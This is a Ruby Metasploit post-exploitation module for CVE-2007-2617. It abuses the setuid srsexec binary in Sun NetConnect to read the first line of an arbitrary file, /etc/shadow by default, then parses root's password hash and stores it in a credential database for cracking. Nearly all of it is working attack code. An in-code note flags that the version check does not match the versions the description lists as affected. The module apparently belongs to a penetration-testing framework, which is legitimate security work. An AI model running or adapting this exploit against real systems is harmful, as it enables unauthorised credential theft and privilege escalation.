##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
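class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Solaris::System
  include Msf::Post::Solaris::Priv

  # Characters the remote shell would interpret if FILE were spliced into the
  # srsexec command line as-is (see #run): whitespace, quoting, expansion,
  # redirection and command separators. FILE is operator input, but a value
  # containing any of these would at best produce a malformed command and at
  # worst run something other than srsexec, so it is rejected up front.
  SHELL_UNSAFE = /[\s'"`$\\;&|<>()*?\[\]{}!#]/.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Solaris srsexec Arbitrary File Reader',
        'Description' => %q{
          This module exploits a vulnerability in NetCommander 3.2.3 and 3.2.5.
          When srsexec is executed in debug (-d) verbose (-v) mode,
          the first line of an arbitrary file can be read due to the suid bit set.
          The most widely accepted exploitation vector is reading /etc/shadow,
          which will reveal root's hash for cracking.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # metasploit module
          'iDefense' # discovery reported anonymously to https://labs.idefense.com
        ],
        'Platform' => [ 'solaris' ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'References' => [
          ['CVE', '2007-2617'],
          ['URL', 'https://download.oracle.com/sunalerts/1000443.1.html'],
          ['URL', 'https://www.securityfocus.com/archive/1/468235'],
          ['EDB', '30021'],
          ['BID', '23915']
        ],
        'DisclosureDate' => '2007-05-07',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )
    register_options([
      OptString.new('FILE', [true, 'File to read the first line of', '/etc/shadow'])
    ])
  end

  # Path of the setuid srsexec helper installed by NetConnect.
  def suid_bin_path
    '/opt/SUNWsrspx/bin/srsexec'
  end

  # Returns true when the target looks exploitable: the session is not
  # already root, a NetConnect uninstall script in the affected version
  # range is present, and srsexec still carries its setuid bit.
  # Raises (via fail_with) when the session already has root privileges.
  def check
    if is_root?
      fail_with(Failure::BadConfig, 'Session already has root privileges')
    end

    # The version is taken from the uninstall script's file name, as suggested
    # by the Sun alert; a glob is used because the name embeds the version.
    unin = cmd_exec '/usr/bin/ls /opt/SUNWsrspx/bin/UninstallNetConnect.*.sh'
    unin =~ /UninstallNetConnect\.([\d.]{11})\.sh/
    unless ::Regexp.last_match(1)
      print_error('NetConnect uninstall not found, either not installed or too new')
      return false
    end

    # Normalise each component through to_i so "3.02.3" and "3.2.3" compare equal.
    version = Rex::Version.new(::Regexp.last_match(1).split('.').map(&:to_i).join('.'))
    # NOTE(review): the Description lists 3.2.3 and 3.2.5 as affected, while this
    # range only accepts 3.2.3.x and 3.2.4 -- confirm against the Sun alert before
    # trusting a negative result from this check.
    unless version.between?(Rex::Version.new('3.2.3'), Rex::Version.new('3.2.4'))
      print_error "#{version} is not vulnerable"
      return false
    end
    print_good("#{version} is vulnerable")

    # Without the setuid bit srsexec runs as the caller and the read is worthless.
    unless setuid?(suid_bin_path)
      vprint_error("#{suid_bin_path} is not setuid, it must have been manually patched")
      return false
    end

    true
  end

  # Runs srsexec in debug/verbose mode against FILE, reassembles the leaked
  # first line from its output, and -- when FILE is /etc/shadow -- stores the
  # user:hash pair in the credential database.
  def run
    file = datastore['FILE'].to_s
    if file.empty? || file.match?(SHELL_UNSAFE)
      fail_with(Failure::BadConfig, 'FILE must be a non-empty path without whitespace or shell metacharacters')
    end

    unless check
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
    end

    # The second argument is arbitrary; a random token keeps the command line
    # from being a fixed signature.
    flag = Rex::Text.rand_text_alpha(5)
    output = cmd_exec("#{suid_bin_path} -dvb #{file} #{flag}")
    vprint_good("Raw Command Output: #{output}")

    first_line = parse_first_line(output)
    if first_line.empty?
      print_error("No file contents found in srsexec output for #{file}")
      return
    end

    print_good("First line of #{file}: #{first_line}")

    return unless file == '/etc/shadow'

    store_shadow_hash(first_line)
  end

  # Reassembles the leaked first line from srsexec's debug output.
  #
  # srsexec emits the line in "binaries file line: ..." chunks cut at 20
  # characters; when a chunk is a full 20 characters, the next chunk starts
  # with the last 2 characters of the previous one followed by the next 18,
  # so those 2 overlapping characters are dropped before the chunks are joined.
  #
  # @param output [String, nil] raw command output
  # @return [String] the reassembled line, empty when nothing matched
  def parse_first_line(output)
    output.to_s.scan(/binaries file line: (.+)$/).flatten.map do |chunk|
      chunk.length == 20 ? chunk[0..17] : chunk
    end.join
  end

  # Stores the user and hash fields of a shadow line as a non-replayable hash.
  # Lines that do not yield both a user and a hash field are reported and
  # skipped instead of being written to the database as empty credentials.
  # Solaris prefixes locked accounts' hashes with "*LK*" (per shadow(4)); those
  # are stored verbatim so the underlying hash is not lost.
  #
  # @param line [String] a line in /etc/shadow format (user:hash:...)
  def store_shadow_hash(line)
    username, hash = line.split(':', 3)
    if username.nil? || username.empty? || hash.nil? || hash.empty?
      print_error("Could not parse a user:hash pair from: #{line}")
      return
    end

    print_good("Adding root's hash to the credential database.")
    credential_data = {
      origin_type: :session,
      session_id: session_db_id,
      workspace_id: myworkspace_id,
      post_reference_name: fullname,
      username: username,
      private_data: hash,
      private_type: :nonreplayable_hash
    }
    create_credential(credential_data)
  end
end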